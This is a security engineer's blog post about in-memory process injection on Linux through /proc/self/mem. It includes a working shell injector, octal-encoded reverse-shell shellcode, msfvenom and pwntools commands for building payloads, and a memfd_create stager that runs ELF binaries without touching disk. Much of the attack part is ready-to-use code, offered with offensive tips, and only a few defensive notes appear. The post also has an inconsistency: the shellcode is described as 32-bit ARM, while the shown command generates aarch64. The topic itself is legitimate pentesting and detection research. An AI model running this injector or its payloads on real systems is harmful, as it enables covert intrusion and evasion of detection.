I'm joev, a security engineer 👋 You may know me from my work at Apple or on Metasploit, or from my CVEs.
In this post I'll cover the history of process injection implementations on Linux, and share a somewhat different and simpler implementation aimed at learning and portability.
When pentesting Linux boxes, you often end up in a common situation: you have command execution as a non-root user and want to stage some native code to run on the target. There are a number of methods to accomplish this, but they can be roughly categorized into the following:
1. Write the native code to disk, then exec() or LD_PRELOAD the code.
2. Use ptrace() or /proc/PID/mem to debug a sacrificial victim process and plant your native code inside of it.
There are downsides to #1. You need a decoding routine, as shell scripts cannot contain binary data. You also need a writable location on disk, which is not always available (e.g. read-only filesystems, chroots, containers). Finally, many intrusion detection systems look specifically for #1 and alert on it, because staging and running a native implant this way is typical malware behavior: it is straightforward and widely compatible.
This post will look at #2.
On Linux you use the ptrace syscall to remotely control the execution of a process and read/write into its memory. This is a pretty suspicious syscall to trigger in an infected process, and from a command injection entrypoint there are not many ways to control it (gdb being one way). Further, most Linux distros implement a sysctl called kernel/yama/ptrace_scope that controls what processes can be ptraced by an unprivileged user:
The sysctl settings (writable only with CAP_SYS_PTRACE) are:
0 - classic ptrace permissions: a process can PTRACE_ATTACH to any other
process running under the same uid, as long as it is dumpable (i.e.
did not transition uids, start privileged, or have called
prctl(PR_SET_DUMPABLE...) already). Similarly, PTRACE_TRACEME is
unchanged.
1 - restricted ptrace: a process must have a predefined relationship
with the inferior it wants to call PTRACE_ATTACH on. By default,
this relationship is that of only its descendants when the above
classic criteria is also met. To change the relationship, an
inferior can call prctl(PR_SET_PTRACER, debugger, ...) to declare
an allowed debugger PID to call PTRACE_ATTACH on the inferior.
Using PTRACE_TRACEME is unchanged.
2 - admin-only attach: only processes with CAP_SYS_PTRACE may use ptrace
with PTRACE_ATTACH, or through children calling PTRACE_TRACEME.
3 - no attach: no processes may use ptrace with PTRACE_ATTACH nor via
PTRACE_TRACEME. Once set, this sysctl value cannot be changed.
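To see which of these modes a given box is in, the sysctl can be read straight from procfs. Below is a minimal Python sketch, assuming the usual /proc/sys/kernel/yama/ptrace_scope path; the helper names are my own, and the labels are copied from the kernel text quoted above. On a target without Python, a plain cat of the same path gives you the raw number.

```python
from pathlib import Path

# Short labels copied from the Yama description quoted above.
PTRACE_SCOPE_MODES = {
    0: "classic ptrace permissions",
    1: "restricted ptrace",
    2: "admin-only attach",
    3: "no attach",
}


def describe_ptrace_scope(raw):
    """Map the raw sysctl text (e.g. '1\\n') to (value, label)."""
    value = int(raw.strip())
    return value, PTRACE_SCOPE_MODES.get(value, "unknown")


def read_ptrace_scope(path="/proc/sys/kernel/yama/ptrace_scope"):
    """Return (value, label), or None when the file cannot be read
    (for example when Yama is not built into the kernel)."""
    try:
        return describe_ptrace_scope(Path(path).read_text())
    except OSError:
        return None
```

Calling read_ptrace_scope() with no arguments checks the local machine; anything other than 2 or 3 means same-uid tricks like the ones in this post are worth trying.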
Most modern production systems set 1, "restricted ptrace", meaning non-root users can only really ptrace child processes. So a simple way to inject code would be to start a sleep child process, attach to it with exec gdb, then go to the current instruction pointer and overwrite the memory it points to with your shellcode. But again, this requires gdb on the box (usually rare) and is pretty noisy.
On defense, setting 2 is often a good recommendation to make, as it prevents any runtime debugging shenanigans without admin privs, and negates this entire class of techniques for non-root users.
On Linux systems, the procfs mount implements mem device files for all processes in the namespace, available at /proc/[pid]/mem. These devices allow using standard filesystem syscalls to manipulate remote process memory. Behind the scenes, they are more or less a clone of parts of the existing ptrace syscalls, and in fact use the same ptrace_scope sysctl and resulting permissions.
This allows us to use standard (util-linux and coreutils) commands (like dd or printf) to seek through and overwrite remote process memory via these device files, which lets us stage native code quietly and without needing a writable location on disk or relying on esoteric binaries. As such, nearly all implementations of process injection on Linux that I have seen use /proc/[pid]/mem for injection.
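To make the "standard filesystem syscalls" point concrete, here is a small Python sketch that reads and then overwrites a buffer in its own address space through /proc/self/mem, using nothing but open, seek, read and write. peek_self, poke_self and demo are hypothetical names of mine; the sketch assumes Linux with procfs mounted, and it only ever touches the current process.

```python
import ctypes


def peek_self(address, length, mem_path="/proc/self/mem"):
    """Read `length` bytes of this process's memory through procfs."""
    with open(mem_path, "rb", buffering=0) as mem:
        mem.seek(address)        # an ordinary lseek() to a virtual address
        return mem.read(length)  # an ordinary read() of whatever is mapped there


def poke_self(address, data, mem_path="/proc/self/mem"):
    """Overwrite this process's memory at `address` through procfs."""
    with open(mem_path, "r+b", buffering=0) as mem:
        mem.seek(address)
        return mem.write(data)   # returns the number of bytes written


def demo():
    """Round-trip a ctypes buffer through /proc/self/mem."""
    buf = ctypes.create_string_buffer(b"hello procfs")
    addr = ctypes.addressof(buf)
    before = peek_self(addr, 5)
    poke_self(addr, b"HELLO")
    return before, buf.raw[:5]
```

The shell version of this is the same two steps: seek the file descriptor to an address, then write bytes at it.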
On defense, consider adding a weighted alert on anomalous attempts to ptrace() or open("/proc/*/mem", "w").
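As a rough illustration of what such a rule could match on, here is a hedged Python sketch. It assumes you already have the path and open flags of each open() call from some event source (auditd, eBPF, and so on, which is out of scope here); is_proc_mem_write is a hypothetical helper, and it does not normalize paths or weigh the result against a baseline.

```python
import os
import re

# Matches /proc/<pid>/mem, /proc/self/mem, and the per-thread variants.
PROC_MEM_RE = re.compile(r"^/proc/(?:self|thread-self|\d+)(?:/task/\d+)?/mem$")


def is_proc_mem_write(path, flags):
    """True when an open() targets a procfs mem file with write access."""
    wants_write = (flags & os.O_ACCMODE) in (os.O_WRONLY, os.O_RDWR)
    return bool(PROC_MEM_RE.match(path)) and wants_write
```

Debuggers and some profilers legitimately trip this, which is why the alert should be weighted rather than absolute.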
The first time I saw this technique used was 2017, in a tool now called GDSSecurity/Cexigua, mentioned in this blog post. I will summarize it below because what the author did was brilliant, but also abject lunacy. In any case, it got the job done for them:
1. Read /proc/[pid]/maps to gather the address of the child process's stack
2. kill -STOP the child
3. Open the /proc/[pid]/mem device
4. Use grep to… dynamically search for ROP gadgets and build a ROP chain that stack pivots into shellcode (????)
5. Use dd to overwrite the child's stack memory with the ROP chain and shellcode
6. kill -CONT the child
Now this is crazy cool, but as the author admits later, the ROP chain is unnecessary. It suffices to just plop some shellcode into memory and have the remote process execute it, which the author eventually realized.
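The first step of that recipe boils down to picking one line out of /proc/[pid]/maps. A rough Python sketch of that lookup follows; find_mapping is a name I made up, and it assumes the usual six-column maps layout (address range, perms, offset, dev, inode, pathname).

```python
def find_mapping(maps_text, name="[stack]"):
    """Return (start, end, perms) for the first mapping named `name`,
    or None if no such mapping is listed."""
    for line in maps_text.splitlines():
        fields = line.split(None, 5)
        # Anonymous mappings have no pathname column, so only 5 fields.
        if len(fields) == 6 and fields[5].strip() == name:
            start, end = (int(x, 16) for x in fields[0].split("-"))
            return start, end, fields[1]
    return None
```

For a live process you would feed it open("/proc/%d/maps" % pid).read(); the same function finds other named regions such as "[heap]".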
If you are wondering "why can you overwrite a process's read-only executable memory without changing its page protections?", basically the Linux kernel helpfully disables write protections during use of ptrace write calls, for developer convenience. A good explanation of how this is achieved amidst things like hardware-based memory protections can be found here.
In 2018, rb from Sektor7 wrote a comprehensive article on the use of ptrace and /proc/*/mem techniques for in-memory shellcode injection on Linux. I highly recommend reading this as a starting point, as it provides a simple (but version/offset-dependent) injection script example at the end.
Following this, a number of tools were developed with similar, evolving techniques for Linux process injection. DavidBuchanan314/dlinject is a more straightforward implementation, but requires Python on the target. arget13/DDexec improves on this by using /bin/sh instead of Python, and by researching and documenting how to avoid command dependencies. DDexec works by overwriting /proc/self/mem in a forked shell process, which is sort of like a process performing brain surgery on itself 🤯. Recently the same dlinject author wrote DavidBuchanan314/stelf-loader, which builds on this approach with an extremely interesting implementation: it lets you provide an ELF input instead of shellcode and handles transparently loading it into memory for you.
On offense, writing tools that run on all the Linux distros (and modern containers) is an art in itself. The best advice IMHO to write tools that live forever is: know the POSIX shell spec, and try to avoid exec()ing to other commands. When you must, only rely on broad packages: util-linux and coreutils are good starting points.
After reviewing the state of the art here, I like to use a much dumber approach: one that requires very little effort to implement but retains wide compatibility across Linux environments. It just does this:
1. Open /proc/self/mem
2. Read /proc/self/syscall to find the return address of the read() syscall
3. Seek to that address with dd skip=..., then write your shellcode payload
4. read() from the child process, triggering the payload
This is written to only require dd (part of coreutils) and absolutely nothing else. It can be pulled together in 4 lines of portable POSIX shell script. Here you go:
PAYLOAD='\002\000\240\343\001\020\240\343\005\040\201\342\214\160'\
'\240\343\215\160\207\342\000\000\000\357\000\140\240\341\140\020'\
'\217\342\020\040\240\343\215\160\240\343\216\160\207\342\000\000'\
'\000\357\006\000\240\341\000\020\240\343\077\160\240\343\000\000'\
'\000\357\006\000\240\341\001\020\240\343\077\160\240\343\000\000'\
'\000\357\006\000\240\341\002\020\240\343\077\160\240\343\000\000'\
'\000\357\044\000\217\342\004\100\044\340\020\000\055\351\015\040'\
'\240\341\044\100\217\342\020\000\055\351\015\020\240\341\013\160'\
'\240\343\000\000\000\357\002\000\025\263\177\000\000\001\057\142'\
'\151\156\057\163\150\000\000\000\000\000\000\000\000\000\163\150'\
'\000\000\000\000\000\000\000\000\000\000\000\000\000\000'
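(
  exec 5>/proc/self/mem                              # open our own memory for writing on fd 5
  read -r _ _ _ _ _ _ _ _ ADDR </proc/self/syscall   # 9th field: program counter inside read()
  # dd copies nothing (count=0); it only seeks fd 5 to ADDR. printf then writes the payload there.
  ( dd count=0 bs=1 skip=$((ADDR)) <&5; printf "${PAYLOAD}" >&5 )
) &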
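The read line in the script leans on the layout of /proc/self/syscall: the syscall number, six argument registers, the stack pointer, and finally the program counter, which is why ADDR is the ninth field. Here is a small Python sketch of the same parsing, based on my reading of proc(5); parse_proc_syscall is a hypothetical helper, and the sample values in the usage note are made up.

```python
def parse_proc_syscall(line):
    """Parse one line of /proc/[pid]/syscall.

    Returns a dict with the syscall number, argument registers, stack
    pointer and program counter, or None when the process is not inside
    a syscall (the file then holds 'running' or a shorter '-1 sp pc' line).
    """
    fields = line.split()
    if len(fields) != 9:
        return None
    return {
        "nr": int(fields[0]),                         # decimal syscall number
        "args": [int(x, 16) for x in fields[1:7]],    # six hex argument registers
        "sp": int(fields[7], 16),                     # stack pointer
        "pc": int(fields[8], 16),                     # where the syscall will return to
    }
```

For example, parsing "0 0x3 0x55d0c0de 0x1000 0x0 0x0 0x0 0x7ffc0000 0x7f0011223344" gives a pc of 0x7f0011223344, which is the value the shell script seeks to before writing the payload.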
Pro tip: On offense, use printf with \000 octal for decoding embedded binary data within a shell script; it's the only binary decoding routine guaranteed by the POSIX sh spec.
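If you prepare payloads on your own workstation, the encoding side is a one-liner, and a matching decoder is handy for checking that nothing got mangled along the way. This is a minimal Python sketch with hypothetical helper names; it always emits three-digit escapes so that a following digit character can never be absorbed into the previous escape.

```python
import re


def to_octal_escapes(data):
    """Encode bytes as three-digit octal escapes that printf can decode."""
    return "".join("\\%03o" % b for b in data)


def from_octal_escapes(text):
    """Decode a string made only of three-digit octal escapes back to bytes."""
    return bytes(int(m, 8) for m in re.findall(r"\\([0-7]{3})", text))
```

A quick sanity check is that from_octal_escapes(to_octal_escapes(blob)) == blob for whatever blob you are about to embed.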
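The shellcode above was generated by metasploit and encoded into octal; it connects a TCP reverse shell to a listener on 127.0.0.1:5555. Note that the bytes as listed decode as 32-bit ARM (armle) instructions (for example, \000\000\000\357 is svc 0), so generate a payload that matches your target. Here is how I generated it (use armle for 32-bit ARM, aarch64 for ARM64 and x64 for X86_64):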
$ docker run -it metasploitframework/metasploit-framework bash
> ./msfvenom -p linux/aarch64/shell_reverse_tcp lhost=127.0.0.1 lport=5555 -f raw | \
ruby -e 'STDIN.read.bytes.each { |b| printf "\\%03o", b }'
Of course a reverse shell payload is not practical at all; we already have command execution in this situation. The much more useful thing to do is to create a memory-backed fd that we can then write an arbitrary ELF executable to and execute. So we'll tweak the shellcode payload a bit to do this. You can use metasm_shell.rb to do this in metasploit, but pwntools makes things a bit easier IMO, as it is architecture-agnostic. We'll have the shellcode call memfd_create, then send itself a SIGSTOP so we can use the memfd from our original shell:
$ docker run --platform linux/amd64 -it pwntools/pwntools
pwntools@d7869fd2a307:/$ python
>>> from pwn import *
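>>> context.arch = 'arm64'
>>> # memfd_create("", 0) creates the in-memory fd; kill(0, 19) then sends SIGSTOP (19)
>>> sc = asm(shellcraft.memfd_create("", 0)) + asm(shellcraft.kill(0, 19))
>>> output = ""
>>> for b in sc:
...     output += "\\%03o" % b
...
>>> print("PAYLOAD='%s'" % output)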
Which yields:
PAYLOAD='\356\003\037\252\356\017\037\370\340\003\000\221\341\003\037'\
'\252\350\042\200\322\001\000\000\324\340\003\037\252\141\002\200\322'\
'\050\020\200\322\001\000\000\324'
After executing the above shellcode, we can find the writable memfd handle number by consulting the child process:
$ CHILD=$!
$ ls -al /proc/$CHILD/fd/
total 0
dr-x------ 2 msf msf 0 Aug 29 20:45 .
dr-xr-xr-x 9 msf msf 0 Aug 29 20:44 ..
lrwx------ 1 msf msf 64 Aug 29 20:45 0 -> /dev/pts/0
lrwx------ 1 msf msf 64 Aug 29 20:45 1 -> /dev/pts/0
lrwx------ 1 msf msf 64 Aug 29 20:45 2 -> /dev/pts/0
lrwx------ 1 msf msf 64 Aug 29 20:45 255 -> /dev/pts/0
lrwx------ 1 msf msf 64 Aug 29 20:45 3 -> /memfd: (deleted)
l-wx------ 1 msf msf 64 Aug 29 20:45 5 -> /proc/123/mem
We can then just use a series of printf statements to write our ELF executable to the memfd on fd#3, and execute it like normal.
$ printf '...' >> /proc/$CHILD/fd/3
$ /proc/$CHILD/fd/3 &
And that is one way to run executables on Linux without ever touching disk. This approach should work on all distributions of Linux, provided kernel/yama/ptrace_scope is set to 1 or lower and the dd binary is available. If by some chance dd is missing (dd is part of coreutils, but you never know), see DDexec for a list of alternative common Linux commands that will seek a file descriptor to a desired offset.